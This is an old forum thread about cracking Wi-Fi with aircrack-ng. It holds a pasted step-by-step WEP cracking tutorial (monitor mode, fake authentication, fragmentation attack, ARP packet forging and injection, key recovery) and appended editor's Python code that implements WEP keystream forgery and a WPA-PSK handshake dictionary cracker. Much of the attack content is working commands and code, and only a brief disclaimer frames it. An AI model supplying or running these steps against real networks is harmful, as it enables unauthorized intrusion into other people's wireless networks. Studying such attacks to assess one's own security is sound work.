
Using Aireplay to crack into my WEP Network

22 replies to this topic

#1 phpforfun

    Speaks fluent binary

  • Expert Member
  • 1056 posts

Posted 05 October 2008 - 09:55 AM

So I am using Remote Exploits software to see if I can get into my own wireless network without the password, and here is the trouble.

[screenshot not preserved]

That step is the last step; anyone know how to switch the wlan0 channel?

EDIT! Not a WEP network, a WPA network.


UPDATE! I changed the channel to 1 on both, however, now it does this:

Sending Authentication Request (Open System)
Authentication successful
Sending Association Request
Denied (code 12), wrong ESSID or WPA?


ERRR! I just want to figure this out

Edited by TkTech, 05 October 2008 - 04:10 PM.
*sigh*

  • 0

#2 Steve.L

    CC Addict

  • Member
  • 382 posts
  • Location: Kingston, Canada
  • Programming Language: C, Java, C++, PHP, Python, Ruby, PL/SQL, Delphi/Object Pascal, Lisp, Pascal, Transact-SQL, Assembly, Scheme, Haskell, Others

Posted 06 October 2008 - 10:06 AM

tutorial [Aircrack-ng]
  • 0

#3 phpforfun

    Speaks fluent binary

  • Expert Member
  • 1056 posts

Posted 06 October 2008 - 11:12 AM

What is your wireless interface? ath0?

See, as far as I know, every tutorial shows the teacher having ath0 and wifi0. When I type "airmon-ng start wifi0 9", it shows ONLY a wlan0, which is weird; it's like wireless is disabled, but it's not.
  • 0

#4 Datab0x

    CC Newcomer

  • Just Joined
  • 13 posts

Posted 07 October 2008 - 08:04 PM

ath0 or wifi0 pertains to the wireless card's interface/chipset. Did you type "airmon-ng" to check what your interface, chipset and driver are? Also, the methods for cracking WPA vs WEP are severely different.

edit: Heh, I didn't see Steve's post, but the link he gave you is what I used to figure pretty much everything out.
  • 0

#5 phpforfun

    Speaks fluent binary

  • Expert Member
  • 1056 posts

Posted 07 October 2008 - 09:38 PM

yeah, I figured out how to do it, just not on my laptop yet..
  • 0

#6 TcM

    CC Mentor

  • VIP Member
  • 7563 posts

Posted 08 October 2008 - 09:46 AM

Why do you want to use wifi0? On mine it worked with wlan0, and I tried it over wifi.
  • 0

#7 kresh7

    CC Addict

  • Just Joined
  • 326 posts

Posted 08 October 2008 - 10:07 AM

I think the problem is that you want to hack into a wireless network with no clients, and for that you're using BackTrack 3, right? OK, here is a post of a friend of mine :D


Monitor Mode

The first thing to do is boot up BackTrack, basically by booting from a CD like you normally would; if you can't figure this out, ask down below or go use Google. Log in to BackTrack as root (password 'toor'), and then type "startx" into the command line to start our GUI.

Sweet, now we are running *nix, and we can start the good stuff. Open up a command line by clicking on the icon that looks like one on the bottom next to the 'start' type thingy (let me know if I get too technical :) )

Now, we need to enter this into the command line;

$ airmon-ng start wifi0 6

**starts wifi0 on channel 6, change for the channel of the network you are attacking, use kismet for this, not covered in this tutorial**

$ wlanconfig ath0 destroy
$ ifconfig ath1 up
$ iwconfig ath1 mode monitor channel 6

**iwconfig needs the "channel" keyword before the number; "mode monitor 6" alone is rejected**

Sweet, now we have our card in monitor mode, and we can move onto bigger and better things.

Start up Airodump and get some info ready

OK, let's start airodump so we can get some info out of it, and then we can just leave it running.

$ airodump-ng --ivs --write bob --channel 6 ath1

**basically here's what each thing means;
--ivs = only write the weak IVs, not every packet
--write = the prefix of the file we are writing to, so bob.ivs
--channel = the channel to scan on
ath1 = our network device**

Now that airodump is running, we need to snag a couple pieces of information from it: 1) the MAC address of the AP we are attacking, it'll be in the first column; 2) the ESSID of the network, i.e. "linksys", or something similar.

Now, open up a new terminal (DON'T CLOSE AIRODUMP). Type this line in;


$ export AP=mac_of_ap


Now we also have to get our MAC address; this is easy in BackTrack, just type in the following;

Code:

$ macchanger --show ath1

**your output here**
$ export MAC=your_mac_address


This basically just stores those as variables, so you don't have to type them a bunch of times in the coming steps.

Getting everything ready

Basically what we are going to do to the network is fake-auth ourselves using aireplay. Then, using the same program, we are going to grab some pieces of packets out of the replies given by fakeauth, and use those to create an ARP reply packet with packetforge, to inject into the network to create IVs, so we can crack the key! Whew, let's get started!

First we need to set up, but NOT run, our fake auth attack;

Code:

$ aireplay-ng -1 0 -e linksys -a $AP -h $MAC ath1

So, we are running aireplay attack 1, with no delay; linksys is the ESSID of the network we are attacking, -a is the MAC of the AP we are attacking, and -h is our MAC address. Don't run this yet, we will soon enough.

Open up another command line, so we can get ready to sniff out the packets we need. Enter the following;

Code:

$ aireplay-ng -5 -b $AP -h $MAC ath1

**the interface goes last, the same as in every other aireplay-ng command; without it the tool has nothing to sniff on**

Cool, step 1 of 2 is done for getting ready to create IVs; next we have to sniff a packet, and then create one of our own. So run the aireplay -5 command first, it will start to sniff the network, then run the first command. Eventually the -5 will find a packet that it can use, and it will ask you if you want to use it; say yes (type y and press enter). Now you can cancel the first command (stop it from fake auth'ing over and over) by pressing ctrl-c. Leave the window open.

Now, after we told aireplay-ng -5 yes, it should have created a .xor file. In the output, the name of it should be there. The line looks like this;

Code:

Saving Keystream in fragment-0215-124336.xor

**yours will be different**

Now, using this .xor file we can create an ARP reply packet which we can inject to create weak IVs. So in the same window we ran the aireplay-ng -5 command, type in the following;

Code:

$ packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y your_.xor_file.xor -w arp-request

That will generate what we need; now we can run the final injection command that will inject the arp-request packets. Enter the following;

Code:

$ aireplay-ng -2 -r arp-request ath1

*you will have to say yes again btw*


Now you get to watch your #data column in airodump (you didn't close it, did you?) skyrocket! Wait a few minutes, and when you have 100k packets (the #data column, 1 mil for 128 bit) run the following command to crack the key!

Code:

$ aircrack-ng -n 64 -b $AP *.ivs

**note, if it's 128 bit, change 64 to 128**


There ya go! You have cracked WEP when there are no clients on the network!

**This is an educational piece, you should not be cracking anybody else's network, it can get you fined/landed in jail, I take no responsibility for anything you do with this information**

**Obligatory Disclaimer; This tutorial was written 'by watchdog' as an educational piece, cracking into somebody else's network is illegal and punishable by fine/jail. Don't be stupid**
  • 1
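Added example (editor's note; this is not part of kresh7's post and not code from aircrack-ng): a toy Python model of the two steps the tutorial above glosses over, aireplay-ng -5 recovering keystream from the fixed LLC/SNAP header of a sniffed data frame and packetforge-ng reusing that keystream to encrypt an ARP request without ever knowing the key. The WEP key, IVs, MAC addresses and frames are all constructed inline, the AP is a few-line stand-in that decrypts, reassembles and re-encrypts, and the fragment relay is simplified (no 802.11 addressing or fragment headers).

```python
# Added example, not code from the forum post or from aircrack-ng: a toy model
# of the steps where aireplay-ng -5 recovers keystream and packetforge-ng
# reuses it. Key, IVs, MACs and frames are constructed inline (not captures).
import os
import zlib

# Every data frame carrying ARP starts with this LLC/SNAP header, so its first
# eight plaintext bytes are known to anyone listening.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")


def rc4(key, n):
    """First n bytes of RC4 keystream for key (KSA then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < n:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: CRC-32, little-endian. Linear, so forgeable."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key, iv, plaintext):
    """Frame body as a real station builds it: IV || RC4(IV||key) XOR (P||ICV)."""
    body = plaintext + icv(plaintext)
    return iv + bytes(b ^ k for b, k in zip(body, rc4(iv + key, len(body))))


def wep_decrypt(key, frame):
    """Plaintext if the ICV verifies, else None. Needs the key (AP/client side)."""
    iv, ct = frame[:3], frame[3:]
    body = bytes(c ^ k for c, k in zip(ct, rc4(iv + key, len(ct))))
    pt, tag = body[:-4], body[-4:]
    return pt if icv(pt) == tag else None


# ---- attacker side: nothing below is ever given the key ---------------------

def keystream_from_known(frame, known):
    """XOR known plaintext into the ciphertext: (iv, keystream[:len(known)])."""
    iv, ct = frame[:3], frame[3:]
    return iv, bytes(c ^ p for c, p in zip(ct, known))


def encrypt_with_keystream(iv, ks, plaintext):
    """What packetforge-ng does with the .xor file: reuse IV + keystream, no key."""
    body = plaintext + icv(plaintext)
    if len(body) > len(ks):
        raise ValueError("need %d keystream bytes, have %d" % (len(body), len(ks)))
    return iv + bytes(b ^ k for b, k in zip(body, ks))


def fragmentation_attack(sniffed, ap_relay, chunk=4, fragments=16):
    """Grow 8 known keystream bytes into chunk*fragments + 4 (the -5 attack).

    Eight keystream bytes encrypt a 4-byte payload plus its 4-byte ICV. Send
    `fragments` such fragments of attacker-chosen filler under the sniffed IV;
    the AP (which has the key) reassembles and relays them as ONE frame under
    a fresh IV. The attacker knows that frame's whole plaintext, so it leaks
    a much longer keystream.
    """
    iv, ks8 = keystream_from_known(sniffed, LLC_SNAP_ARP)
    filler = os.urandom(chunk * fragments)
    frags = [encrypt_with_keystream(iv, ks8, filler[i:i + chunk])
             for i in range(0, len(filler), chunk)]
    relayed = ap_relay(frags)
    return keystream_from_known(relayed, filler + icv(filler))


def forge_arp_request(iv, ks, sender_mac, sender_ip, target_ip):
    """LLC/SNAP + 28-byte ARP request (who-has target_ip tell sender_ip), encrypted."""
    arp = (b"\x00\x01\x08\x00\x06\x04\x00\x01" + sender_mac + sender_ip
           + bytes(6) + target_ip)
    return encrypt_with_keystream(iv, ks, LLC_SNAP_ARP + arp)


def demo():
    """Whole chain; returns what the AP decrypts from the forged frame (or None)."""
    key = os.urandom(5)  # 40-bit WEP key; never passed to the attacker functions

    def ap_relay(frags):  # simplified AP: decrypt each, reassemble, re-encrypt
        parts = [wep_decrypt(key, f) for f in frags]
        if None in parts:
            raise RuntimeError("AP dropped a fragment with a bad ICV")
        return wep_encrypt(key, os.urandom(3), b"".join(parts))

    # A real client sends some ARP; the attacker relies only on its first 8 bytes.
    sniffed = wep_encrypt(key, os.urandom(3), LLC_SNAP_ARP + os.urandom(28))
    iv, ks = fragmentation_attack(sniffed, ap_relay)
    forged = forge_arp_request(iv, ks, bytes.fromhex("001122334455"),
                               bytes([255] * 4), bytes([255] * 4))
    return wep_decrypt(key, forged)  # non-None: the AP accepted the forgery
```

Call demo(); it returns the plaintext the AP recovers from the forged frame, i.e. the same ARP request that the tutorial's aireplay-ng -2 step then replays to make the #data column climb. Two properties of WEP make this work and neither depends on key length: the 24-bit IV is sent in the clear and may be reused, and the ICV is a plain CRC-32, so anyone holding keystream for an IV can produce a frame the AP accepts. The -n 64/128 flag in aircrack-ng only changes how many IVs the key-recovery step needs, not whether the forgery succeeds.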

#8 TcM

    CC Mentor

  • VIP Member
  • 7563 posts

Posted 08 October 2008 - 10:20 AM

Kresh, you are always a genius in these things!
  • 0

#9 kresh7

    CC Addict

  • Just Joined
  • 326 posts

Posted 08 October 2008 - 10:56 AM

Thx TcM, just trying to help :D
  • 0

#10 phpforfun

    Speaks fluent binary

  • Expert Member
  • 1056 posts

Posted 08 October 2008 - 06:50 PM

I already got it working lol.

I might make a tutorial on it, not sure
  • 0

#11 Datab0x

    CC Newcomer

  • Just Joined
  • 13 posts

Posted 08 October 2008 - 07:33 PM

Yeah, I'd like to see how you accomplished it. I only know how to do it using dictionary attacks or deauthentication.
  • 0
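Added example (editor's note; not part of Datab0x's post and not code from aircrack-ng): what the WPA "dictionary attack" Datab0x mentions actually computes from one captured 4-way handshake, which is the path that applies to the WPA network in the first post rather than the WEP tutorial above. The handshake here is constructed in-process from a known passphrase so that it runs offline; the SSID, MAC addresses and nonces are made-up values, not a capture, and only message 2 of the handshake is modelled.

```python
# Added example, not code from the forum post or from aircrack-ng: what a
# WPA/WPA2-PSK dictionary attack computes from one captured 4-way handshake.
# The handshake is constructed in-process from a known passphrase so this runs
# offline; the SSID, MACs and nonces are made-up values, not a capture.
import hashlib
import hmac
import os
import struct

# EAPOL header (4) + descriptor type, key info, key length, replay counter (13)
# + nonce (32) + key IV (16) + RSC (8) + ID (8) = 81 bytes before the MIC field.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, ssid):
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    4096 HMACs per guess is why this is a wordlist attack, not a brute force."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11i PRF over min/max MACs and min/max nonces; the first 16 bytes
    are the KCK, the key that signs the handshake messages."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:48]  # KCK (16) || KEK (16) || TK (16) for CCMP


def eapol_mic(kck, frame):
    """Key descriptor version 2 (WPA2/AES): HMAC-SHA1-128 over the frame with
    the MIC field zeroed."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(kck, snonce, replay_counter=1):
    """Handshake message 2 (station -> AP): carries SNonce and the first MIC."""
    key_info = 0x010A  # descriptor version 2, pairwise key, MIC present
    body = (struct.pack(">BHHQ", 2, key_info, 16, replay_counter) + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack(">H", 0))
    frame = struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL v2, type 3 = Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def make_handshake(passphrase, ssid="linksys"):
    """Stand-in for what airodump-ng captures: the station knows the passphrase."""
    ap_mac, sta_mac = bytes.fromhex("00146c000001"), bytes.fromhex("001122334455")
    anonce, snonce = os.urandom(32), os.urandom(32)
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    return (ssid, ap_mac, sta_mac, anonce, snonce, build_msg2(kck, snonce))


def crack(handshake, wordlist):
    """Per candidate: PMK -> PTK -> KCK -> MIC, compared with the captured MIC.
    Returns the matching passphrase or None if the wordlist misses."""
    ssid, ap_mac, sta_mac, anonce, snonce, msg2 = handshake
    captured = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid),
                           ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured):
            return candidate
    return None
```

Nothing in this path uses fake authentication: the MIC that each guess is checked against comes from a real client's handshake, which is why Datab0x pairs the dictionary attack with deauthentication (a deauth forces a client to reconnect and repeat the handshake where airodump can see it), and why a network with no clients, the scenario of the WEP tutorial above, gives you nothing to crack this way. Note also that the SSID is the PBKDF2 salt, so a PMK computed for one SSID cannot be reused against another.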

#12 TcM

    CC Mentor

  • VIP Member
  • 7563 posts

Posted 09 October 2008 - 07:01 AM

Why would you use such a method? When it can be easily cracked?!
  • 0




